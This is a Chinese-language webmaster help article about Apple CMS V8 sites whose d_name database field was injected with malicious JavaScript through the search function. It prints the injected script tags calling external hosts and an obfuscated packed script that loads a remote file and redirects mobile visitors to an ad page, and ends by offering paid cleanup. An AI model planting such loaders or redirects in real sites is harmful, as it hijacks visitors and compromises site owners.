首页 > CMS建站 > 苹果CMS > 正文

苹果CMS V8被入侵数据库表字段d_name被恶意挂马怎么办

2020-07-02 22:21:52
字体:
来源:转载
供稿:网友
这篇文章主要为大家详细介绍了苹果CMS V8被入侵数据库表字段d_name被恶意挂马怎么办,具有一定的参考价值,感兴趣的小伙伴们可以参考一下,有需要的朋友可以收藏方便以后借鉴。

     做网站最闹心的就是两种情况,一种网站被引擎拔毛没了流量,另外一种就是网站被一些无耻之徒恶意挂马,恶心得一米。很多小白站长总是叹息:为什么我们好好做站就是被人家搞,我好难啊!

     这不织梦模板网小编最近老是接到一些用户的咨询反馈:苹果CMS V8被入侵数据库表字段d_name被恶意挂马怎么办。如下图所示:

苹果CMS V8被入侵数据库表字段d_name被恶意挂马怎么办

从上面的图中我们不能看出苹果CMS的影视系统在其标题字段d_name中被人恶意挂上一段JS 的跳转代码。

<script src=https://lefengtv.com/js/tjj.js></script><script src=https://www.kilin.xyz/1.js>

目前在织梦模板小编这边反馈的大概是以上2个JS跳转代码,可以看得出来,经过分析我们得知这个是基本是同一个人搞的入侵,几乎是市面上80%的苹果CMS V8系统都中招了。除了上面的标题被恶意挂马,还有很多JS也被恶意写如了跳转代码,如下:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('4.5(/'<6 1="3/2"7="//0.b.c.d/8.0"><///9/'+/'a>/');',14,14,'js|type|javascript|text|document|write|script|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout('window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}

上面恶意代码对访问用户进行了判断,如果是手机端的,IOS,安卓,以及平板都会跳转到攻击者设置好的广告网页当中去,https://m.zhuanjiyin.net:168/index.html?u=80666就是跳转到这里,根据织梦模板小编安全技术的分析与统计,大部分被攻击的网站跳转都是168端口的网址上,域名经常变换,但是168端口。

       经过我们技术的发现该漏洞通过post index.php搜索功能进行插入数据库并嵌入挂马代码,漏洞产生的原因是电影搜索里可以插入恶意代码,攻击者将恶意代码加密后,不管你服务器用云锁,还是宝塔,安全狗,都是拦截不了的,还是会被篡改。

     这个问题不是普通的用户和站长就能处理的,遇到这样的问题建议您联系专业的人员或机构帮您彻底处理,亦或这联系我们的在线客服帮您有偿处理。

以上就是苹果CMS V8被入侵数据库表字段d_name被恶意挂马怎么办的全部内容,希望对大家的学习和解决疑问有所帮助,也希望大家多多支持错新网。
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表